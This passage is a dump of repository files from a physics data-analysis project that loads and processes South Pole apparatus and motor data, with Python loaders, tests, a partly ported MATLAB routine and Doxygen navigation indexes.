+T.tm_mday+(T.tm_hour+T.tm_min/60+T.tm_sec/3600)/24-730531.5 \n\ndef siderealTimeMe(T=None):\n if T==None:\n T=time.time();\n T-=946684800\n return T/secsPerSidDay#/secsPerSidDay#30*366.242199\n" }, { "alpha_fraction": 0.6071916222572327, "alphanum_fraction": 0.6490669250488281, "avg_line_length": 33.82539749145508, "blob_id": "3e06f1904bee62ef8cf19fabf18f6cca6d05f82c", "content_id": "801eed8662d37ad02b02e3d867b2d5ee63f263ed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2197, "license_type": "no_license", "max_line_length": 116, "num_lines": 63, "path": "/openCPT.py", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom os import path\nimport os\nimport re\n\nbase_dir=os.environ['SP_DATA_DIR']\nddir= \"/media/morgan/6a0066c2-6c13-49f4-9322-0b818dda2fe8/Princeton Data/South Pole/SP_aparatus 5240.33 Bundle/\"\nfilepath=ddir+\"SP_aparatus 5240.33 Medium 2.bin\"\n\n\ntemplate_regex='SP_aparatus (\\d+(?:\\.\\d*)?|\\.\\d+) {0}( \\d+)?\\.bin'\n\ndef loadApparatusFiles(root_path, useMetaFile=True):\n dirname=path.dirname(root_path) \n rootname=path.basename(root_path) \n r=re.compile('{0}( \\d+)?\\.bin'.format(rootname))\n dlist=os.listdir(dirname);\n dlist=[st for st in dlist if r.match(st)]\n dlist.sort( key=lambda st: int(r.match(st).groups()[0]) ) # dlist is now sorted\n \n dat_list=[openFile(path.join(dirname, fname), useMetaFile=useMetaFile) for fname in dlist]\n # Combine these into a single file...\n\n dat=np.hstack(dat_list)\n #datnames=dat_list[0].keys()\n return dat\n\ndef openFile(filepath, nVars=1, useMetaFile=False, endian='>'):\n timeDataType=[('sd', endian+'f8')]\n if useMetaFile:\n fname_components=path.splitext(filepath)[0].split(' ')\n if fname_components[-1].isdigit():\n fname_components.pop()\n meta_file_path=' '.join(fname_components) + '.meta'\n if path.exists(meta_file_path):\n mfile=open(meta_file_path)\n elif path.exists(meta_file_path+'.txt'):\n mfile=open(meta_file_path+'.txt')\n else:\n raise IOError\n sigNames=mfile.readlines()\n sigNames=[name.strip() for name in sigNames]\n if sigNames[0]=='Sidereal Days':\n sigNames=sigNames[1:]\n 
nVars=len(sigNames)\n sigDataType=[(name, endian+'f4') for name in sigNames]\n\n else:\n sigDataType=[('s{0}'.format(n), endian+'f4') for n in range(1,nVars+1)]\n\n\n\n totalDataType=timeDataType+sigDataType\n print(\"total dtype: {0}\".format(totalDataType))\n dat=np.fromfile(filepath, totalDataType)\n\n return dat;\n\nif __name__==\"__main__\":\n\n ddir= \"/media/morgan/6a0066c2-6c13-49f4-9322-0b818dda2fe8/Princeton Data/South Pole/SP_aparatus 5240.33 Bundle/\"\n filepath=ddir+\"SP_aparatus 5240.33 Medium 2.bin\"\n dat=loadApparatusFiles(ddir+'SP_aparatus 5240.33 Medium')\n\n\n\n" }, { "alpha_fraction": 0.629983127117157, "alphanum_fraction": 0.6479505896568298, "avg_line_length": 28.180328369140625, "blob_id": "9af728840b28d6594ace2ce9b0d6869513241283", "content_id": "af0734c187644f62c10471532789e2bf6df7e1a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1781, "license_type": "no_license", "max_line_length": 94, "num_lines": 61, "path": "/getSPdata.py", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "from os import path\nfrom os import environ\n\ndef getSPData(timestamp, rotations, interval, delay):\n\n base_data_dir=environ['SP_DATA_DIR'];\n\n ddir=path.join(base_data_dir, 'SP_aparatus {0} Bundle'.format(timestamp))\n\n [sdF,sigF,sdM,sigM,sdRe,sigRe,sdS,sigS,medNames,reNames,sloNames]=loadCPTFiles(timestamp);\n\n% Get triggers either by making them if parameters are given or loading\n% them from the triggers file if available\nif nargin>1\n trig=makeTrigM(sdF,rotations,interval,delay);\n if trig(end)>sdF(end)\n trig=trig(1:end-rotations);\n end\nelse\n trig=[];\n rotations=find(diff(trig)>(trig(2)-trig(1))*1.1,1);\nend\nmtrig=[];\nsdP=[]; pos=[]; stat=[];\nsensor=[]; sensorNames=[];\nif isdir( fullfile(data_dir, ['SP_motor ',timestamp,' Bundle']) )\n cd( fullfile(data_dir, ['SP_motor ',timestamp,' Bundle']) );\n trigfiles=dir('*triggers*.txt');\n posfiles=dir('*positions*.bin');\n sensfiles=dir('*sensors*.bin');\n for i=1:length(trigfiles)\n mtrig=[mtrig;load(trigfiles(i).name)];\n end\n for i=1:length(posfiles)\n fid=fopen(posfiles(i).name);\n sdP=[sdP;fread(fid,'float64',8)];\n fseek(fid,0,'bof');\n data=fread(fid,'int32=>int32');\n data2=reshape(data,4,length(data)/4)';\n pos=[pos;data2(:,3)];\n stat=[stat;data2(:,4)];\n fclose(fid);\n end\n for i=1:length(sensfiles)\n end\nend\nif isempty(trig)\n trig=mtrig;\nend\nif rem(length(trig),rotations)\n disp(['There are ',num2str(rem(length(trig),rotations)),' extra triggers!'])\nend\n\n% Check North positions using Apparatus Position in Relaxed data \nif ~isempty(sdRe) & (mean(sigRe(:,19))>1)\n checkNorth(sdRe,sigRe,trig(1:find(trig<max(sdRe),1,'last')));\nend\n \nzerodata=GetZeroDataSP(timestamp);\ncd(start_dir)\nend\n\n" }, { "alpha_fraction": 0.4693877696990967, "alphanum_fraction": 0.7329931855201721, "avg_line_length": 57.900001525878906, "blob_id": "51f1b71b5cf69f8d8b59125c15c81cd7fc3f02d6", "content_id": "1b898959daf917947b6bea8cc246dd19cb7530b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 588, "license_type": "no_license", "max_line_length": 89, "num_lines": 10, "path": "/html/openCPT_8py.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var openCPT_8py =\n[\n [ \"loadApparatusFiles\", \"openCPT_8py.html#a8d2cf2d1cdb625fa3ea7d0ec4e7af575\", null ],\n [ \"openFile\", \"openCPT_8py.html#a123c419a688aefb0d6d482eca7512d36\", null ],\n [ \"base_dir\", 
\"openCPT_8py.html#a6195f6525b22b29221384f9235fe1062\", null ],\n [ \"dat\", \"openCPT_8py.html#a3e5077d300b3260fd9aa1487e0e15a3e\", null ],\n [ \"ddir\", \"openCPT_8py.html#a629d9addea1bbee10544941d7c301ba8\", null ],\n [ \"filepath\", \"openCPT_8py.html#ad49f00cb69a927479558926f2158898f\", null ],\n [ \"template_regex\", \"openCPT_8py.html#a87910852db48cafc314ea9372f00a401\", null ]\n];" }, { "alpha_fraction": 0.47975459694862366, "alphanum_fraction": 0.7325153350830078, "avg_line_length": 61.769229888916016, "blob_id": "b9b24377c38529f3920ec4076239c09594bb285b", "content_id": "e2da9481e803d911f93aacaa13dff809b27bb30b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 815, "license_type": "no_license", "max_line_length": 81, "num_lines": 13, "path": "/html/openMotor_8py.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var openMotor_8py =\n[\n [ \"loadAbin\", \"openMotor_8py.html#a04420d495757844bca7113b696a2cb1d\", null ],\n [ \"loadBins\", \"openMotor_8py.html#a67f554beaac0864d301fab58bf86397b\", null ],\n [ \"dat\", \"openMotor_8py.html#aba6f1fba127e2142e12df0163a37f98c\", null ],\n [ \"dat2\", \"openMotor_8py.html#a7e71c31c6f2be1f7dd4c5818fbc3b12e\", null ],\n [ \"dat3\", \"openMotor_8py.html#a7e9dd8e353fa85c7c0ecdda03da8d64e\", null ],\n [ \"ddir\", \"openMotor_8py.html#ab3fcb2684f3321af9bd6715fa1c12675\", null ],\n [ \"ddir2\", \"openMotor_8py.html#a7845f46665131b51ba25ba3adfaf4958\", null ],\n [ \"fname\", \"openMotor_8py.html#a1ca6afbef052898575edbdf81a19cce4\", null ],\n [ \"fname2\", \"openMotor_8py.html#ab3194f8b875a45048365db97cf0d0fd0\", null ],\n [ \"fpath\", \"openMotor_8py.html#aa622e663d644f1b366ed96d4f2b34cf2\", null ]\n];" }, { "alpha_fraction": 0.6016949415206909, "alphanum_fraction": 0.6016949415206909, "avg_line_length": 22.799999237060547, "blob_id": "badcdb8d0ae8793b4333b149eaefef6cec81dd49", "content_id": "59af953ef4edab8e4032228af14a8a12f68f6d60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 118, "license_type": "no_license", "max_line_length": 54, "num_lines": 5, "path": "/html/annotated.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var annotated =\n[\n [ \"repo\", \"namespacerepo.html\", \"namespacerepo\" ],\n [ \"object\", \"classobject.html\", null ]\n];" }, { "alpha_fraction": 0.5088235139846802, "alphanum_fraction": 0.5529412031173706, "avg_line_length": 41.5, "blob_id": "98997773d8a07ec315dbc7361da14351b869ade2", "content_id": "99bd690d74bfa801b0fe2b0908cf676e0b2741c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 340, "license_type": "no_license", "max_line_length": 69, "num_lines": 8, "path": "/html/search/files_5.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var searchData=\n[\n ['scrap_2epy',['scrap.py',['../scrap_8py.html',1,'']]],\n ['sdtime_2epy',['sdtime.py',['../sdtime_8py.html',1,'']]],\n ['spdataset_2epy',['SPDataSet.py',['../SPDataSet_8py.html',1,'']]],\n ['spfuncs_2epy',['SPfuncs.py',['../SPfuncs_8py.html',1,'']]],\n ['spgraphs_2epy',['SPgraphs.py',['../SPgraphs_8py.html',1,'']]]\n];\n" }, { "alpha_fraction": 0.4960170090198517, "alphanum_fraction": 0.7488051056861877, "avg_line_length": 74.36000061035156, "blob_id": "eb1e2221101d1a44d78b3860f3b9f35153ae98e4", "content_id": "594e92f7d6d4f1e0243a581e2f59132c68e09865", "detected_licenses": [], "is_generated": 
false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1883, "license_type": "no_license", "max_line_length": 95, "num_lines": 25, "path": "/html/loadSPFiles_8py.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var loadSPFiles_8py =\n[\n [ \"getAllSPSensor\", \"loadSPFiles_8py.html#ad96607a97fb1364b1b8f5a96a6537818\", null ],\n [ \"getAllTimeStamps\", \"loadSPFiles_8py.html#a1a641072729c4056f58d2f36926b21d1\", null ],\n [ \"getSpinningDataNames\", \"loadSPFiles_8py.html#ad67a85b681c64920ca3d127dcbb8693a\", null ],\n [ \"loadABin\", \"loadSPFiles_8py.html#a48f328dcf32e16ad58677599d39be6a1\", null ],\n [ \"loadBins\", \"loadSPFiles_8py.html#af4f5d276f8094f09b7f23a7e43031b4b\", null ],\n [ \"loadSet\", \"loadSPFiles_8py.html#ac05316301b88456778eaedde597c8ed5\", null ],\n [ \"loadSetInfo\", \"loadSPFiles_8py.html#a94905f8c986f1a826f5e14c6c271d3bc\", null ],\n [ \"loadZeroFile\", \"loadSPFiles_8py.html#aa6876f5f9096cba233794dd03f719de3\", null ],\n [ \"writeSetInfo\", \"loadSPFiles_8py.html#a7a17d807e31989fac9962e7eb5fa3de5\", null ],\n [ \"dat\", \"loadSPFiles_8py.html#a83183382a5277a75ee1031f6ef284691\", null ],\n [ \"dat2\", \"loadSPFiles_8py.html#aed6d44730b91f4104569281ef51b335d\", null ],\n [ \"dat3\", \"loadSPFiles_8py.html#a450ab2273d44a0e76443c6e31b162908\", null ],\n [ \"dat_f\", \"loadSPFiles_8py.html#a8966ac451acc4e186f9a8c9d299da497\", null ],\n [ \"ddir\", \"loadSPFiles_8py.html#a65abcc2d7333a2e99d3d3376b616f959\", null ],\n [ \"ddir2\", \"loadSPFiles_8py.html#a39efcdddf61ee790cdf9c4dfbd9e7080\", null ],\n [ \"fname\", \"loadSPFiles_8py.html#acfe87f91d2373c3c41bf59a6024b8a94\", null ],\n [ \"fname2\", \"loadSPFiles_8py.html#a9058f0ead0c926f493bb7f6ae52a49ea\", null ],\n [ \"fname_f\", \"loadSPFiles_8py.html#af897386d87d4d72567fb337653aa3105\", null ],\n [ \"fpath\", \"loadSPFiles_8py.html#a8ffbf3fed92bc26b4248caebb30ade38\", null ],\n [ \"fpath_f\", \"loadSPFiles_8py.html#a931d7ee8b1015ac25cbca6eee1f77bea\", null ],\n [ \"mediumNames\", \"loadSPFiles_8py.html#af4aa2bb0015793d7b7e493e4aa4f4b8c\", null ],\n [ \"relaxedNames\", \"loadSPFiles_8py.html#a92ba966a3b7423fd4d0c7874d3f92e71\", null ]\n];" }, { "alpha_fraction": 0.5129368901252747, "alphanum_fraction": 0.7476168870925903, "avg_line_length": 77.71428680419922, "blob_id": "13991af4decadeeefeaaac147d313d4048ea35a0", "content_id": "1ce0444a4fe81e164abff24f7926fcc43ee1f162", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2203, "license_type": "no_license", "max_line_length": 175, "num_lines": 28, "path": "/html/SPDataSet_8py.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var SPDataSet_8py =\n[\n [ \"SPDataSet\", \"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html\", \"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet\" ],\n [ \"checkDSUnc\", \"SPDataSet_8py.html#af6b0d8ee29678751051a0b15362f9949\", null ],\n [ \"divide_args\", \"SPDataSet_8py.html#a9d0e07e3e1f4360be4f8c59927abe142\", null ],\n [ \"divide_args_memo\", \"SPDataSet_8py.html#a296fa19993c2ac2fa6db975b8b0f6b88\", null ],\n [ \"genSeqFiltPol\", \"SPDataSet_8py.html#a5a94fa78adaa1ce53cae1e69c7a10c1f\", null ],\n [ \"seqFiltFunc2Axes\", \"SPDataSet_8py.html#aae98530dd28697279534ad7dd042acd8\", null ],\n [ \"seqFiltFuncAngle\", \"SPDataSet_8py.html#aa23a4db7857d6d485ae098e21e29cf59\", null ],\n [ \"seqFiltFuncAxis\", \"SPDataSet_8py.html#acf5db24745ff3b8a02816869e9b10482\", null ],\n [ 
\"seqFiltFuncAxisInterleave\", \"SPDataSet_8py.html#aee5e268a39b4f3d7d26b8cd8c2eb0dce\", null ],\n [ \"seqFiltFuncInterleave\", \"SPDataSet_8py.html#ae9bed330120419db29ade2d021ca34d7\", null ],\n [ \"seqFiltFuncSlc\", \"SPDataSet_8py.html#abc13a280637f719ae917c9f2cf2d9d47\", null ],\n [ \"seqFiltFuncTime\", \"SPDataSet_8py.html#ac07feedd7af03661a0925bdec0d1f1fe\", null ],\n [ \"testDS\", \"SPDataSet_8py.html#ab3e94a5db004f2a1cbe3b89005731d7c\", null ],\n [ \"testDS2\", \"SPDataSet_8py.html#ae343b1ec862928d74ae9f6e140008b0d\", null ],\n [ \"d\", \"SPDataSet_8py.html#ae71666498d0f08a9d2c39f65c8be15e1\", null ],\n [ \"ds\", \"SPDataSet_8py.html#a9dcba74d2fb20a6a41c191302ec5136b\", null ],\n [ \"errs\", \"SPDataSet_8py.html#a3c7145cc42e7ec16a596f5996a8e70e2\", null ],\n [ \"rsBase\", \"SPDataSet_8py.html#a6b49ba99ee674be07d78e57e0d6a4506\", null ],\n [ \"rsL\", \"SPDataSet_8py.html#a794711a619d88291abbe1c9c29396b5b\", null ],\n [ \"sAmp\", \"SPDataSet_8py.html#a7ef84c87edaf55c60c75aa4a6b63fabf\", null ],\n [ \"sidAmpL\", \"SPDataSet_8py.html#aaa1cf30f24f4635798c2ac9ab8cb991f\", null ],\n [ \"st\", \"SPDataSet_8py.html#aa809f797a727977783e89201eb7515ba\", null ],\n [ \"timestampL\", \"SPDataSet_8py.html#ab977d64bf78ed1ce32101398d66e2673\", null ],\n [ \"ts\", \"SPDataSet_8py.html#a2e421078d46e1d8f3b0c2d7c8211e1a2\", null ],\n [ \"ys\", \"SPDataSet_8py.html#af4556d66bac96baab9aed887e66ce083\", null ]\n];" }, { "alpha_fraction": 0.6150000095367432, "alphanum_fraction": 0.7674999833106995, "avg_line_length": 79, "blob_id": "c4b0a077f089b704d1862db5fac9823ba3c6fd75", "content_id": "a743ca72e7402ab68ae67c71559cbbf083b5d32a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 400, "license_type": "no_license", "max_line_length": 197, "num_lines": 5, "path": "/html/search/variables_6.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var searchData=\n[\n ['mediumnames',['mediumNames',['../namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1loadSPFiles.html#af4aa2bb0015793d7b7e493e4aa4f4b8c',1,'repo::programs::pythonpackages::pr::loadSPFiles']]],\n ['mtrig',['mtrig',['../namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1getSPdata.html#a98628f2f931f1936c89b4f2c90610736',1,'repo::programs::pythonpackages::pr::getSPdata']]]\n];\n" }, { "alpha_fraction": 0.5666666626930237, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 21.5, "blob_id": "4f9e3e76686bce344ce6d6b0c3404afb20e6a75f", "content_id": "718042a29e6ed4c9e2c9eec71557dffb7dec0114", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 90, "license_type": "no_license", "max_line_length": 68, "num_lines": 4, "path": "/html/search/files_2.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var searchData=\n[\n ['getspdata_2epy',['getSPdata.py',['../getSPdata_8py.html',1,'']]]\n];\n" }, { "alpha_fraction": 0.624365508556366, "alphanum_fraction": 0.7639594078063965, "avg_line_length": 77.80000305175781, "blob_id": "825fd55a97b6f1bf8b010bd07bffb7a12a670511", "content_id": "c1eda7e2483d8f554be94178890674617ca6bc49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 394, "license_type": "no_license", "max_line_length": 186, "num_lines": 5, "path": "/html/search/variables_8.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var searchData=\n[\n 
['pointdata',['PointData',['../namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPfuncs.html#a1ffb0a48d6d36a1260a65e82c4604ce2',1,'repo::programs::pythonpackages::pr::SPfuncs']]],\n ['posfiles',['posfiles',['../namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1getSPdata.html#ab7bcb6dc1e35e343ea3d5a9f790c1f42',1,'repo::programs::pythonpackages::pr::getSPdata']]]\n];\n" }, { "alpha_fraction": 0.6990991234779358, "alphanum_fraction": 0.7297297120094299, "avg_line_length": 31.58823585510254, "blob_id": "0972d3ac69c11200be3b5719e8b33125af7c42da", "content_id": "cd7db5e08cbd077a1d54d363ff7bb16663249e85", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1110, "license_type": "no_license", "max_line_length": 120, "num_lines": 34, "path": "/test_SPfuncs.py", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "import SPfuncs as spf\nimport SPDataSet as sd\nimport pytest\nfrom matplotlib import *\n\n\[email protected]\ndef fake_data_stop_start_4dirs():\n rSpec=spf.RotationSpec(startingAngle=0, delay=9, interval=30, numRotations=20, rotAngles=[180], extraRotAngle=90)\n return sd.testDS(rSpec)\n\[email protected]\ndef fake_data_stop_start_2dirs():\n rSpec= spf.RotationSpec(startingAngle=0, delay=9, interval=30, numRotations=20, rotAngles=[180], extraRotAngle=0)\n return sd.testDS(rSpec)\n\[email protected]\ndef fake_data_continuous():\n ds=sd.SPDataSet('5410.04')\n rAmp=ds.rawData()\n rAmpAdded=spf.addFakeData(rAmp, rotationRate=ds.set_info['rotationRate'], amp=20, bBlankOriginalData=True, phi=pi/5)\n ds.fastD=rAmpAdded\n return ds\n #ds=sd.SPDataSet('test_test', preloadDict={'fastD': [s, sig, 'sig']})\n #need to put something ehre\n\ndef test_continuous_fitting(fake_data_continuous):\n contData=fake_data_continuous\n print(contData.sidAmp(subtractHarmsL=[]))\n\ndef test_cutAmp(fake_data_stop_start_4dirs):\n madeData=fake_data_stop_start_4dirs\n cA=madeData.cutAmp()\n print(cA.sig.shape)\n\n\n" }, { "alpha_fraction": 0.5731147527694702, "alphanum_fraction": 0.580983579158783, "avg_line_length": 33.65909194946289, "blob_id": "ba6505ca2773d9d46429e302ae8b64dfc4256828", "content_id": "09e6003bff18d2a11d4da7ff04a3e1320a29ae28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1525, "license_type": "no_license", "max_line_length": 90, "num_lines": 44, "path": "/convert.py", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "import os\nimport re\n\ndef allDirsSpmeta2Npmeta(base_dir=os.getenv('SP_DATA_DIR')):\n ap_dir_regex=re.compile('.*SP_aparatus (\\d+(?:\\.\\d*)?|\\.\\d+) Bundle.*')\n mo_dir_regex=re.compile('.*SP_motor (\\d+(?:\\.\\d*)?|\\.\\d+) Bundle.*')\n\n it=os.walk(base_dir)\n for D in it:\n files=D[2]\n metaFiles=[fn for fn in files if fn.endswith(\".meta\") or fn.endswith('.meta.txt')]\n for metaFile in metaFiles:\n fpath=os.path.join(D[0], metaFile)\n if ap_dir_regex.match(D[0]):\n spmeta2npmeta(fpath, 'apparatus')\n #if mo_dir_regex.match(D[0]):\n # spmeta2npmeta(fpath, 'motor')\n\ndef spmeta2npmeta(filePath, style=None):\n \"\"\"Style can be 'apparatus' or 'motor'\n \"\"\"\n if style is None:\n motorI=filePath.rfind('motor')\n apparatusI=filePath.rfind('aparatus')\n if motorI==apparatusI:\n raise ValueError(\"Don't know what kind of meta file {0} is.\".format(filePath))\n else:\n style = 'motor' if motorI>apparatusI else 'apparatus'\n\n lines=open(filePath).readlines()\n if style=='apparatus':\n endian='>'\n elif 
style=='motor':\n endian='<'\n else:\n raise NotImplementedError(\"Don't know what style '{}' is\".format(style))\n output= ['{}, {}f8\\r\\n'.format(lines.pop(0).strip(), endian)]\n output+= ['{}, {}f4\\r\\n'.format(line.strip(), endian) for line in lines]\n\n\n ind=filePath.rfind('.meta')\n outPath=filePath[:ind] + '.npmeta'\n\n open(outPath, 'w').writelines(output)\n" }, { "alpha_fraction": 0.6127451062202454, "alphanum_fraction": 0.7549019455909729, "avg_line_length": 50, "blob_id": "884200c01d36210df21025799d895e20276d733a", "content_id": "920fcb010a1577aa39d7940cadb9f12d59b1c98d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 204, "license_type": "no_license", "max_line_length": 182, "num_lines": 4, "path": "/html/search/functions_b.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var searchData=\n[\n ['openfile',['openFile',['../namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1openCPT.html#a123c419a688aefb0d6d482eca7512d36',1,'repo::programs::pythonpackages::pr::openCPT']]]\n];\n" }, { "alpha_fraction": 0.42585551738739014, "alphanum_fraction": 0.7731305360794067, "avg_line_length": 52.79545593261719, "blob_id": "55df586574872e7c2f7ff326a1bfb7e116e7c858", "content_id": "8af0c71590257de85d3469174d586ab963ee3078", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2367, "license_type": "no_license", "max_line_length": 70, "num_lines": 44, "path": "/html/navtreeindex1.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var NAVTREEINDEX1 =\n{\n\"openCPT_8py.html#a8d2cf2d1cdb625fa3ea7d0ec4e7af575\":[2,0,4,0],\n\"openCPT_8py.html#ad49f00cb69a927479558926f2158898f\":[2,0,4,5],\n\"openCPT_8py_source.html\":[2,0,4],\n\"openMotor_8py.html\":[2,0,5],\n\"openMotor_8py.html#a04420d495757844bca7113b696a2cb1d\":[2,0,5,0],\n\"openMotor_8py.html#a1ca6afbef052898575edbdf81a19cce4\":[2,0,5,7],\n\"openMotor_8py.html#a67f554beaac0864d301fab58bf86397b\":[2,0,5,1],\n\"openMotor_8py.html#a7845f46665131b51ba25ba3adfaf4958\":[2,0,5,6],\n\"openMotor_8py.html#a7e71c31c6f2be1f7dd4c5818fbc3b12e\":[2,0,5,3],\n\"openMotor_8py.html#a7e9dd8e353fa85c7c0ecdda03da8d64e\":[2,0,5,4],\n\"openMotor_8py.html#aa622e663d644f1b366ed96d4f2b34cf2\":[2,0,5,9],\n\"openMotor_8py.html#ab3194f8b875a45048365db97cf0d0fd0\":[2,0,5,8],\n\"openMotor_8py.html#ab3fcb2684f3321af9bd6715fa1c12675\":[2,0,5,5],\n\"openMotor_8py.html#aba6f1fba127e2142e12df0163a37f98c\":[2,0,5,2],\n\"openMotor_8py_source.html\":[2,0,5],\n\"pages.html\":[],\n\"scrap_8py.html\":[2,0,6],\n\"scrap_8py.html#aceae244c0ee91c8c30885ebb02f12c7e\":[2,0,6,0],\n\"scrap_8py_source.html\":[2,0,6],\n\"sdtime_8py.html\":[2,0,7],\n\"sdtime_8py.html#a5247b0c3e822a26482ae1a8d008b2ec6\":[2,0,7,6],\n\"sdtime_8py.html#a59ed699fb07f9e8b979643c5b26e3797\":[2,0,7,2],\n\"sdtime_8py.html#a5d2548fae8d4ed6901f999ff428401f4\":[2,0,7,0],\n\"sdtime_8py.html#a923e8ccb4500449396bcb1ad3435f968\":[2,0,7,5],\n\"sdtime_8py.html#a9988d76304d783450b792ae158a393e3\":[2,0,7,1],\n\"sdtime_8py.html#a9c31dc1e910e733dd210a93a75cc56b6\":[2,0,7,8],\n\"sdtime_8py.html#abe29426e8a972325a35a61402a87f188\":[2,0,7,10],\n\"sdtime_8py.html#ac3c7ee3324f1c4723a245f4ddf08cd41\":[2,0,7,9],\n\"sdtime_8py.html#ac9d3c2155d402d7c140fe3247e1f5722\":[2,0,7,11],\n\"sdtime_8py.html#ace685a49213778d5d1d332877d6aba88\":[2,0,7,4],\n\"sdtime_8py.html#ad0dcc84eadafdd803d57e73ef2c6e4a2\":[2,0,7,12],\n\"sdtime_8py.html#ad97ec56a6ba609ebcc68f1734ec3d8d5\":[
2,0,7,7],\n\"sdtime_8py.html#adda3c804411530cc0adb21939874cffa\":[2,0,7,3],\n\"sdtime_8py_source.html\":[2,0,7],\n\"test__SPfuncs_8py.html\":[2,0,11],\n\"test__SPfuncs_8py.html#a287834089412b429481b6b2b90e2d6bf\":[2,0,11,4],\n\"test__SPfuncs_8py.html#a590b9f06cd4d860f79e97e27c86548ed\":[2,0,11,0],\n\"test__SPfuncs_8py.html#a5b95fcf3c92f76fce1b2bf36daa02403\":[2,0,11,1],\n\"test__SPfuncs_8py.html#a5faeabf3b186e4e18ec4ee66a1111342\":[2,0,11,2],\n\"test__SPfuncs_8py.html#af18588089ac02705cb7205aec7430241\":[2,0,11,3],\n\"test__SPfuncs_8py_source.html\":[2,0,11]\n};\n" }, { "alpha_fraction": 0.6648648381233215, "alphanum_fraction": 0.7243243455886841, "avg_line_length": 45.25, "blob_id": "f33d98a3c30b50e5415ed9e9da183fd73d1fd354", "content_id": "f591eed753ad995bd65d4c94c6b29aa797f2ad86", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 185, "license_type": "no_license", "max_line_length": 163, "num_lines": 4, "path": "/html/search/classes_1.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var searchData=\n[\n ['spdataset',['SPDataSet',['../classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html',1,'repo::programs::pythonpackages::pr::SPDataSet']]]\n];\n" }, { "alpha_fraction": 0.5641109347343445, "alphanum_fraction": 0.5933417081832886, "avg_line_length": 42.806251525878906, "blob_id": "2911de96051c1d4ece7444823ce51581f464aa30", "content_id": "47619dd3076aa7867532a4748223e9659cb3f7fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 64521, "license_type": "no_license", "max_line_length": 262, "num_lines": 1440, "path": "/SPfuncs.py", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "\"\"\"Useful functions for processing the SP data. 
Hopefully some are generic enough to be used elsewhere too.\r\n\r\n\"\"\"\r\nfrom __future__ import division\r\nfrom pylab import *\r\nimport matplotlib\r\nfrom matplotlib.gridspec import GridSpec, GridSpecFromSubplotSpec\r\nimport numpy as np\r\nfrom scipy import stats\r\nfrom copy import deepcopy\r\nimport pdb\r\nfrom collections import namedtuple\r\nfrom scipy.optimize import curve_fit\r\nfrom scipy.ndimage import convolve1d\r\nimport os\r\nfrom itertools import count\r\nimport re\r\nimport MT, MF\r\nfrom MT import nonnan, cached_property, nancurve_fit, figDontReplace, running_median_insort, vprint\r\nfrom scipy import random\r\nfrom scipy.signal import windows\r\nfrom statsmodels import api as sm\r\n#from SPDataSet import SPDataSet\r\n\r\nbTest=False\r\n\r\ndef secs2sd(secs):\r\n return secs/23.9344696/3600;\r\ndef sd2secs(sd):\r\n return sd*23.9344696*3600;\r\n\r\nWindow =namedtuple('Window', ['duration', 'offset'])\r\nRotationSpec=namedtuple('RotationSpec', ['startingAngle', 'delay', 'interval', 'rotAngles', 'extraRotAngle', 'numRotations']);\r\nRawData=namedtuple('RawData', ['t', 'sig'])\r\nPointData=namedtuple('PointData', ['t', 'sig', 'err', 'chi2', 'theta' ])\r\nCorrelationData=namedtuple('CorrelationData', ['t', 'sig', 'err', 'chi2', 'theta'])\r\nSiderealFitData=namedtuple('SiderealFitData', ['t', 'sig', 'err', 'chi2', 'sidTheta','labTheta', 